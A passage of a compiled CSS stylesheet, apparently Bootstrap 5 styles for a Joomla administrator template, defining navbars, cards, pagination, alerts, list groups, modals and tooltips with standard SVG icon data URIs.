  .navbar-expand-xxl .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-xxl .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-xxl .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-xxl .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-xxl .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-xxl .navbar-toggler {
    display: none;
  }
}
.navbar-expand {
  flex-wrap: nowrap;
  justify-content: flex-start;
}
.navbar-expand .navbar-nav {
  flex-direction: row;
}
.navbar-expand .navbar-nav .dropdown-menu {
  position: absolute;
}
.navbar-expand .navbar-nav .nav-link {
  padding-right: 0.5rem;
  padding-left: 0.5rem;
}
.navbar-expand .navbar-nav-scroll {
  overflow: visible;
}
.navbar-expand .navbar-collapse {
  display: flex !important;
  flex-basis: auto;
}
.navbar-expand .navbar-toggler {
  display: none;
}

.navbar-light .navbar-brand {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-brand:hover, .navbar-light .navbar-brand:focus {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-nav .nav-link {
  color: rgba(0, 0, 0, 0.55);
}
.navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus {
  color: rgba(0, 0, 0, 0.7);
}
.navbar-light .navbar-nav .nav-link.disabled {
  color: rgba(0, 0, 0, 0.3);
}
.navbar-light .navbar-nav .show > .nav-link,
.navbar-light .navbar-nav .nav-link.active {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-toggler {
  color: rgba(0, 0, 0, 0.55);
  border-color: rgba(0, 0, 0, 0.1);
}
.navbar-light .navbar-toggler-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%280, 0, 0, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e");
}
.navbar-light .navbar-text {
  color: rgba(0, 0, 0, 0.55);
}
.navbar-light .navbar-text a,
.navbar-light .navbar-text a:hover,
.navbar-light .navbar-text a:focus {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-dark .navbar-brand {
  color: #fff;
}
.navbar-dark .navbar-brand:hover, .navbar-dark .navbar-brand:focus {
  color: #fff;
}
.navbar-dark .navbar-nav .nav-link {
  color: rgba(255, 255, 255, 0.55);
}
.navbar-dark .navbar-nav .nav-link:hover, .navbar-dark .navbar-nav .nav-link:focus {
  color: rgba(255, 255, 255, 0.75);
}
.navbar-dark .navbar-nav .nav-link.disabled {
  color: rgba(255, 255, 255, 0.25);
}
.navbar-dark .navbar-nav .show > .nav-link,
.navbar-dark .navbar-nav .nav-link.active {
  color: #fff;
}
.navbar-dark .navbar-toggler {
  color: rgba(255, 255, 255, 0.55);
  border-color: rgba(255, 255, 255, 0.1);
}
.navbar-dark .navbar-toggler-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%28255, 255, 255, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e");
}
.navbar-dark .navbar-text {
  color: rgba(255, 255, 255, 0.55);
}
.navbar-dark .navbar-text a,
.navbar-dark .navbar-text a:hover,
.navbar-dark .navbar-text a:focus {
  color: #fff;
}

.card {
  position: relative;
  display: flex;
  flex-direction: column;
  min-width: 0;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: border-box;
  border: 0 solid transparent;
  border-radius: 0.25rem;
}
.card > hr {
  margin-right: 0;
  margin-left: 0;
}
.card > .list-group {
  border-top: inherit;
  border-bottom: inherit;
}
.card > .list-group:first-child {
  border-top-width: 0;
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.card > .list-group:last-child {
  border-bottom-width: 0;
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.card > .card-header + .list-group,
.card > .list-group + .card-footer {
  border-top: 0;
}

.card-body {
  flex: 1 1 auto;
  padding: 1rem 1rem;
}

.card-title {
  margin-bottom: 0.5rem;
}

.card-subtitle {
  margin-top: -0.25rem;
  margin-bottom: 0;
}

.card-text:last-child {
  margin-bottom: 0;
}

.card-link:hover {
  text-decoration: none;
}
.card-link + .card-link {
  margin-left: 1rem;
}

.card-header {
  padding: 0.5rem 1rem;
  margin-bottom: 0;
  background-color: rgba(0, 0, 0, 0.03);
  border-bottom: 0 solid transparent;
}
.card-header:first-child {
  border-radius: 0.25rem 0.25rem 0 0;
}

.card-footer {
  padding: 0.5rem 1rem;
  background-color: rgba(0, 0, 0, 0.03);
  border-top: 0 solid transparent;
}
.card-footer:last-child {
  border-radius: 0 0 0.25rem 0.25rem;
}

.card-header-tabs {
  margin-right: -0.5rem;
  margin-bottom: -0.5rem;
  margin-left: -0.5rem;
  border-bottom: 0;
}

.card-header-pills {
  margin-right: -0.5rem;
  margin-left: -0.5rem;
}

.card-img-overlay {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  padding: 1rem;
  border-radius: 0.25rem;
}

.card-img,
.card-img-top,
.card-img-bottom {
  width: 100%;
}

.card-img,
.card-img-top {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}

.card-img,
.card-img-bottom {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.card-group > .card {
  margin-bottom: 1rem;
}
@media (min-width: 576px) {
  .card-group {
    display: flex;
    flex-flow: row wrap;
  }
  .card-group > .card {
    flex: 1 0 0%;
    margin-bottom: 0;
  }
  .card-group > .card + .card {
    margin-left: 0;
    border-left: 0;
  }
  .card-group > .card:not(:last-child) {
    border-top-right-radius: 0;
    border-bottom-right-radius: 0;
  }
  .card-group > .card:not(:last-child) .card-img-top,
.card-group > .card:not(:last-child) .card-header {
    border-top-right-radius: 0;
  }
  .card-group > .card:not(:last-child) .card-img-bottom,
.card-group > .card:not(:last-child) .card-footer {
    border-bottom-right-radius: 0;
  }
  .card-group > .card:not(:first-child) {
    border-top-left-radius: 0;
    border-bottom-left-radius: 0;
  }
  .card-group > .card:not(:first-child) .card-img-top,
.card-group > .card:not(:first-child) .card-header {
    border-top-left-radius: 0;
  }
  .card-group > .card:not(:first-child) .card-img-bottom,
.card-group > .card:not(:first-child) .card-footer {
    border-bottom-left-radius: 0;
  }
}

.breadcrumb {
  display: flex;
  flex-wrap: wrap;
  padding: 0 0;
  margin-bottom: 1rem;
  list-style: none;
  background-color: var(--white);
}

.breadcrumb-item + .breadcrumb-item {
  padding-left: 0.5rem;
}
.breadcrumb-item + .breadcrumb-item::before {
  float: left;
  padding-right: 0.5rem;
  color: #666e76;
  content: var(--breadcrumb-divider, "/") /* rtl: var(--breadcrumb-divider, "/") */;
}
.breadcrumb-item.active {
  color: #666e76;
}

.pagination {
  display: flex;
  padding-left: 0;
  list-style: none;
}

.page-link {
  position: relative;
  display: block;
  color: var(--template-link-color);
  background-color: #fff;
  border: 1px solid #dee2e6;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .page-link {
    transition: none;
  }
}
.page-link:hover {
  z-index: 2;
  color: var(--template-link-hover-color);
  background-color: #e8e8e8;
  border-color: #dee2e6;
}
.page-link:focus {
  z-index: 3;
  color: var(--template-link-hover-color);
  background-color: #e8e8e8;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}

.page-item:not(:first-child) .page-link {
  margin-left: -1px;
}
.page-item.active .page-link {
  z-index: 3;
  color: #fff;
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.page-item.disabled .page-link {
  color: #666e76;
  pointer-events: none;
  background-color: #fff;
  border-color: #dee2e6;
}

.page-link {
  padding: 0.375rem 0.75rem;
}

.page-item:first-child .page-link {
  border-top-left-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.page-item:last-child .page-link {
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}

.pagination-lg .page-link {
  padding: 0.75rem 1.5rem;
  font-size: 1.25rem;
}
.pagination-lg .page-item:first-child .page-link {
  border-top-left-radius: 0.3rem;
  border-bottom-left-radius: 0.3rem;
}
.pagination-lg .page-item:last-child .page-link {
  border-top-right-radius: 0.3rem;
  border-bottom-right-radius: 0.3rem;
}

.pagination-sm .page-link {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
}
.pagination-sm .page-item:first-child .page-link {
  border-top-left-radius: 0.2rem;
  border-bottom-left-radius: 0.2rem;
}
.pagination-sm .page-item:last-child .page-link {
  border-top-right-radius: 0.2rem;
  border-bottom-right-radius: 0.2rem;
}

.badge {
  display: inline-block;
  padding: 0.3rem 0.2rem;
  font-size: 0.75rem;
  font-weight: 700;
  line-height: 1;
  color: #fff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: 0.2rem;
}
.badge:empty {
  display: none;
}

.btn .badge {
  position: relative;
  top: -1px;
}

.alert {
  position: relative;
  padding: 1rem 1rem;
  margin-bottom: 1rem;
  border: 1px solid transparent;
  border-radius: 0.25rem;
}

.alert-heading {
  color: inherit;
}

.alert-link {
  font-weight: 700;
}

.alert-dismissible {
  padding-right: 3rem;
}
.alert-dismissible .btn-close {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  padding: 1.25rem 1rem;
}

.alert-primary {
  color: #0b1c32;
  background-color: #d0d5dd;
  border-color: #b8c1cb;
}
.alert-primary .alert-link {
  color: #091628;
}

.alert-secondary {
  color: #2c3034;
  background-color: #dbdcdd;
  border-color: #c8cbcd;
}
.alert-secondary .alert-link {
  color: #23262a;
}

.alert-success {
  color: #294b32;
  background-color: #dae5dd;
  border-color: #c7d8cc;
}
.alert-success .alert-link {
  color: #213c28;
}

.alert-info {
  color: #193f6e;
  background-color: #d4e1f1;
  border-color: #bfd2ea;
}
.alert-info .alert-link {
  color: #143258;
}

.alert-warning {
  color: #664808;
  background-color: #fff0d0;
  border-color: #ffe9b9;
}
.alert-warning .alert-link {
  color: #523a06;
}

.alert-danger {
  color: #761817;
  background-color: #f3d4d4;
  border-color: #eebfbe;
}
.alert-danger .alert-link {
  color: #5e1312;
}

.alert-light {
  color: #636464;
  background-color: #fefefe;
  border-color: #fdfdfe;
}
.alert-light .alert-link {
  color: #4f5050;
}

.alert-dark {
  color: #141619;
  background-color: #d3d3d4;
  border-color: #bcbebf;
}
.alert-dark .alert-link {
  color: #101214;
}

.alert-atum-link-color {
  color: #193f6e;
  background-color: #d4e1f1;
  border-color: #bfd2ea;
}
.alert-atum-link-color .alert-link {
  color: #143258;
}

.alert-atum-text-dark {
  color: #2c3034;
  background-color: #dbdcdd;
  border-color: #c8cbcd;
}
.alert-atum-text-dark .alert-link {
  color: #23262a;
}

.alert-action {
  color: #0b1c32;
  background-color: #d0d5dd;
  border-color: #b8c1cb;
}
.alert-action .alert-link {
  color: #091628;
}

.alert-error {
  color: #230807;
  background-color: #d8cfce;
  border-color: #c4b6b6;
}
.alert-error .alert-link {
  color: #1c0606;
}

.alert-alert-success {
  color: #091c14;
  background-color: #cfd5d3;
  border-color: #b7c1bc;
}
.alert-alert-success .alert-link {
  color: #071610;
}

@-webkit-keyframes progress-bar-stripes {
  0% {
    background-position-x: 1rem;
  }
}

@keyframes progress-bar-stripes {
  0% {
    background-position-x: 1rem;
  }
}
.progress {
  display: flex;
  height: 1rem;
  overflow: hidden;
  font-size: 0.75rem;
  background-color: #e8e8e8;
  border-radius: 0.25rem;
}

.progress-bar {
  display: flex;
  flex-direction: column;
  justify-content: center;
  overflow: hidden;
  color: #fff;
  text-align: center;
  white-space: nowrap;
  background-color: #2a69b7;
  transition: width 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
  .progress-bar {
    transition: none;
  }
}

.progress-bar-striped {
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 1rem 1rem;
}

.progress-bar-animated {
  -webkit-animation: 1s linear infinite progress-bar-stripes;
          animation: 1s linear infinite progress-bar-stripes;
}
@media (prefers-reduced-motion: reduce) {
  .progress-bar-animated {
    -webkit-animation: none;
            animation: none;
  }
}

.list-group {
  display: flex;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
  border-radius: 0.25rem;
}

.list-group-numbered {
  list-style-type: none;
  counter-reset: section;
}
.list-group-numbered > li::before {
  content: counters(section, ".") ". ";
  counter-increment: section;
}

.list-group-item-action {
  width: 100%;
  color: #495057;
  text-align: inherit;
}
.list-group-item-action:hover, .list-group-item-action:focus {
  z-index: 1;
  color: #495057;
  text-decoration: none;
  background-color: #f8f9fa;
}
.list-group-item-action:active {
  color: var(--template-text-dark);
  background-color: #e8e8e8;
}

.list-group-item {
  position: relative;
  display: block;
  padding: 0.75rem 1rem;
  color: #212529;
  background-color: var(--white-offset);
  border: 1px solid hsl(var(--hue), 40%, 85%);
}
.list-group-item:first-child {
  border-top-left-radius: inherit;
  border-top-right-radius: inherit;
}
.list-group-item:last-child {
  border-bottom-right-radius: inherit;
  border-bottom-left-radius: inherit;
}
.list-group-item.disabled, .list-group-item:disabled {
  color: #666e76;
  pointer-events: none;
  background-color: var(--white-offset);
}
.list-group-item.active {
  z-index: 2;
  color: #fff;
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.list-group-item + .list-group-item {
  border-top-width: 0;
}
.list-group-item + .list-group-item.active {
  margin-top: -1px;
  border-top-width: 1px;
}

.list-group-horizontal {
  flex-direction: row;
}
.list-group-horizontal > .list-group-item:first-child {
  border-bottom-left-radius: 0.25rem;
  border-top-right-radius: 0;
}
.list-group-horizontal > .list-group-item:last-child {
  border-top-right-radius: 0.25rem;
  border-bottom-left-radius: 0;
}
.list-group-horizontal > .list-group-item.active {
  margin-top: 0;
}
.list-group-horizontal > .list-group-item + .list-group-item {
  border-top-width: 1px;
  border-left-width: 0;
}
.list-group-horizontal > .list-group-item + .list-group-item.active {
  margin-left: -1px;
  border-left-width: 1px;
}

@media (min-width: 576px) {
  .list-group-horizontal-sm {
    flex-direction: row;
  }
  .list-group-horizontal-sm > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-sm > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-sm > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-sm > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-sm > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 768px) {
  .list-group-horizontal-md {
    flex-direction: row;
  }
  .list-group-horizontal-md > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-md > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-md > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-md > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-md > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 992px) {
  .list-group-horizontal-lg {
    flex-direction: row;
  }
  .list-group-horizontal-lg > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-lg > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-lg > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-lg > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-lg > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 1200px) {
  .list-group-horizontal-xl {
    flex-direction: row;
  }
  .list-group-horizontal-xl > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-xl > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-xl > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-xl > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-xl > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 1400px) {
  .list-group-horizontal-xxl {
    flex-direction: row;
  }
  .list-group-horizontal-xxl > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-xxl > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-xxl > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-xxl > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-xxl > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
.list-group-flush {
  border-radius: 0;
}
.list-group-flush > .list-group-item {
  border-width: 0 0 1px;
}
.list-group-flush > .list-group-item:last-child {
  border-bottom-width: 0;
}

.list-group-item-primary {
  color: #0b1c32;
  background-color: #d0d5dd;
}
.list-group-item-primary.list-group-item-action:hover, .list-group-item-primary.list-group-item-action:focus {
  color: #0b1c32;
  background-color: #bbc0c7;
}
.list-group-item-primary.list-group-item-action.active {
  color: #fff;
  background-color: #0b1c32;
  border-color: #0b1c32;
}

.list-group-item-secondary {
  color: #2c3034;
  background-color: #dbdcdd;
}
.list-group-item-secondary.list-group-item-action:hover, .list-group-item-secondary.list-group-item-action:focus {
  color: #2c3034;
  background-color: #c5c6c7;
}
.list-group-item-secondary.list-group-item-action.active {
  color: #fff;
  background-color: #2c3034;
  border-color: #2c3034;
}

.list-group-item-success {
  color: #294b32;
  background-color: #dae5dd;
}
.list-group-item-success.list-group-item-action:hover, .list-group-item-success.list-group-item-action:focus {
  color: #294b32;
  background-color: #c4cec7;
}
.list-group-item-success.list-group-item-action.active {
  color: #fff;
  background-color: #294b32;
  border-color: #294b32;
}

.list-group-item-info {
  color: #193f6e;
  background-color: #d4e1f1;
}
.list-group-item-info.list-group-item-action:hover, .list-group-item-info.list-group-item-action:focus {
  color: #193f6e;
  background-color: #bfcbd9;
}
.list-group-item-info.list-group-item-action.active {
  color: #fff;
  background-color: #193f6e;
  border-color: #193f6e;
}

.list-group-item-warning {
  color: #664808;
  background-color: #fff0d0;
}
.list-group-item-warning.list-group-item-action:hover, .list-group-item-warning.list-group-item-action:focus {
  color: #664808;
  background-color: #e6d8bb;
}
.list-group-item-warning.list-group-item-action.active {
  color: #fff;
  background-color: #664808;
  border-color: #664808;
}

.list-group-item-danger {
  color: #761817;
  background-color: #f3d4d4;
}
.list-group-item-danger.list-group-item-action:hover, .list-group-item-danger.list-group-item-action:focus {
  color: #761817;
  background-color: #dbbfbf;
}
.list-group-item-danger.list-group-item-action.active {
  color: #fff;
  background-color: #761817;
  border-color: #761817;
}

.list-group-item-light {
  color: #636464;
  background-color: #fefefe;
}
.list-group-item-light.list-group-item-action:hover, .list-group-item-light.list-group-item-action:focus {
  color: #636464;
  background-color: #e5e5e5;
}
.list-group-item-light.list-group-item-action.active {
  color: #fff;
  background-color: #636464;
  border-color: #636464;
}

.list-group-item-dark {
  color: #141619;
  background-color: #d3d3d4;
}
.list-group-item-dark.list-group-item-action:hover, .list-group-item-dark.list-group-item-action:focus {
  color: #141619;
  background-color: #bebebf;
}
.list-group-item-dark.list-group-item-action.active {
  color: #fff;
  background-color: #141619;
  border-color: #141619;
}

.list-group-item-atum-link-color {
  color: #193f6e;
  background-color: #d4e1f1;
}
.list-group-item-atum-link-color.list-group-item-action:hover, .list-group-item-atum-link-color.list-group-item-action:focus {
  color: #193f6e;
  background-color: #bfcbd9;
}
.list-group-item-atum-link-color.list-group-item-action.active {
  color: #fff;
  background-color: #193f6e;
  border-color: #193f6e;
}

.list-group-item-atum-text-dark {
  color: #2c3034;
  background-color: #dbdcdd;
}
.list-group-item-atum-text-dark.list-group-item-action:hover, .list-group-item-atum-text-dark.list-group-item-action:focus {
  color: #2c3034;
  background-color: #c5c6c7;
}
.list-group-item-atum-text-dark.list-group-item-action.active {
  color: #fff;
  background-color: #2c3034;
  border-color: #2c3034;
}

.list-group-item-action {
  color: #0b1c32;
  background-color: #d0d5dd;
}
.list-group-item-action.list-group-item-action:hover, .list-group-item-action.list-group-item-action:focus {
  color: #0b1c32;
  background-color: #bbc0c7;
}
.list-group-item-action.list-group-item-action.active {
  color: #fff;
  background-color: #0b1c32;
  border-color: #0b1c32;
}

.list-group-item-error {
  color: #230807;
  background-color: #d8cfce;
}
.list-group-item-error.list-group-item-action:hover, .list-group-item-error.list-group-item-action:focus {
  color: #230807;
  background-color: #c2bab9;
}
.list-group-item-error.list-group-item-action.active {
  color: #fff;
  background-color: #230807;
  border-color: #230807;
}

.list-group-item-alert-success {
  color: #091c14;
  background-color: #cfd5d3;
}
.list-group-item-alert-success.list-group-item-action:hover, .list-group-item-alert-success.list-group-item-action:focus {
  color: #091c14;
  background-color: #bac0be;
}
.list-group-item-alert-success.list-group-item-action.active {
  color: #fff;
  background-color: #091c14;
  border-color: #091c14;
}

.btn-close {
  box-sizing: content-box;
  width: 1em;
  height: 1em;
  padding: 0.25em 0.25em;
  color: #000;
  background: transparent url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23000'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/1em auto no-repeat;
  border: 0;
  border-radius: 0.25rem;
  opacity: 0.5;
}
.btn-close:hover {
  color: #000;
  text-decoration: none;
  opacity: 0.75;
}
.btn-close:focus {
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
  opacity: 1;
}
.btn-close:disabled, .btn-close.disabled {
  pointer-events: none;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  opacity: 0.25;
}

.btn-close-white {
  -webkit-filter: invert(1) grayscale(100%) brightness(200%);
          filter: invert(1) grayscale(100%) brightness(200%);
}

.modal {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1050;
  display: none;
  width: 100%;
  height: 100%;
  overflow-x: hidden;
  overflow-y: auto;
  outline: 0;
}

.modal-dialog {
  position: relative;
  width: auto;
  margin: 0.5rem;
  pointer-events: none;
}
.modal.fade .modal-dialog {
  transition: -webkit-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
  transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -webkit-transform: translate(0, -50px);
          transform: translate(0, -50px);
}
@media (prefers-reduced-motion: reduce) {
  .modal.fade .modal-dialog {
    transition: none;
  }
}
.modal.show .modal-dialog {
  -webkit-transform: none;
          transform: none;
}
.modal.modal-static .modal-dialog {
  -webkit-transform: scale(1.02);
          transform: scale(1.02);
}

.modal-dialog-scrollable {
  height: calc(100% - 1rem);
}
.modal-dialog-scrollable .modal-content {
  max-height: 100%;
  overflow: hidden;
}
.modal-dialog-scrollable .modal-body {
  overflow-y: auto;
}

.modal-dialog-centered {
  display: flex;
  align-items: center;
  min-height: calc(100% - 1rem);
}

.modal-content {
  position: relative;
  display: flex;
  flex-direction: column;
  width: 100%;
  pointer-events: auto;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
  outline: 0;
}

.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1040;
  width: 100vw;
  height: 100vh;
  background-color: #000;
}
.modal-backdrop.fade {
  opacity: 0;
}
.modal-backdrop.show {
  opacity: 0.5;
}

.modal-header {
  display: flex;
  flex-shrink: 0;
  align-items: center;
  justify-content: space-between;
  padding: 1rem 1rem;
  border-bottom: 1px solid #dee2e6;
  border-top-left-radius: calc(0.3rem - 1px);
  border-top-right-radius: calc(0.3rem - 1px);
}
.modal-header .btn-close {
  padding: 0.5rem 0.5rem;
  margin: -0.5rem -0.5rem -0.5rem auto;
}

.modal-title {
  margin-bottom: 0;
  line-height: 1.5;
}

.modal-body {
  position: relative;
  flex: 1 1 auto;
  padding: 1rem;
}

.modal-footer {
  display: flex;
  flex-wrap: wrap;
  flex-shrink: 0;
  align-items: center;
  justify-content: flex-end;
  padding: 0.75rem;
  border-top: 1px solid #dee2e6;
  border-bottom-right-radius: calc(0.3rem - 1px);
  border-bottom-left-radius: calc(0.3rem - 1px);
}
.modal-footer > * {
  margin: 0.25rem;
}

@media (min-width: 576px) {
  .modal-dialog {
    max-width: 500px;
    margin: 1.75rem auto;
  }

  .modal-dialog-scrollable {
    height: calc(100% - 3.5rem);
  }

  .modal-dialog-centered {
    min-height: calc(100% - 3.5rem);
  }

  .modal-sm {
    max-width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg,
.modal-xl {
    max-width: 800px;
  }
}
@media (min-width: 1200px) {
  .modal-xl {
    max-width: 1140px;
  }
}
.modal-fullscreen {
  width: 100vw;
  max-width: none;
  height: 100%;
  margin: 0;
}
.modal-fullscreen .modal-content {
  height: 100%;
  border: 0;
  border-radius: 0;
}
.modal-fullscreen .modal-header {
  border-radius: 0;
}
.modal-fullscreen .modal-body {
  overflow-y: auto;
}
.modal-fullscreen .modal-footer {
  border-radius: 0;
}

@media (max-width: 575.98px) {
  .modal-fullscreen-sm-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-sm-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-sm-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-sm-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-sm-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 767.98px) {
  .modal-fullscreen-md-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-md-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-md-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-md-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-md-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 991.98px) {
  .modal-fullscreen-lg-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-lg-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-lg-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-lg-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-lg-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 1199.98px) {
  .modal-fullscreen-xl-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-xl-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-xl-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-xl-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-xl-down .modal-footer {
    border-radius: 0;
  }
}
@media (max-width: 1399.98px) {
  .modal-fullscreen-xxl-down {
    width: 100vw;
    max-width: none;
    height: 100%;
    margin: 0;
  }
  .modal-fullscreen-xxl-down .modal-content {
    height: 100%;
    border: 0;
    border-radius: 0;
  }
  .modal-fullscreen-xxl-down .modal-header {
    border-radius: 0;
  }
  .modal-fullscreen-xxl-down .modal-body {
    overflow-y: auto;
  }
  .modal-fullscreen-xxl-down .modal-footer {
    border-radius: 0;
  }
}
.tooltip {
  position: absolute;
  z-index: 1070;
  display: block;
  margin: 0;
  font-family: var(--font-sans-serif);
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.8rem;
  word-wrap: break-word;
  opacity: 0;
}
.tooltip.show {
  opacity: 0.9;
}
.tooltip .tooltip-arrow {
  position: absolute;
  display: block;
  width: 0.8rem;
  height: 0.4rem;
}
.tooltip .tooltip-arrow::before {
  position: absolute;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-tooltip-top, .bs-tooltip-auto[data-popper-placement^=top] {
  padding: 0.4rem 0;
}
.bs-tooltip-top .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow {
  bottom: 0;
}
.bs-tooltip-top .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow::before {
  top: -1px;
  border-width: 0.4rem 0.4rem 0;
  border-top-color: #000;
}

.bs-tooltip-end, .bs-tooltip-auto[data-popper-placement^=right] {
  padding: 0 0.4rem;
}
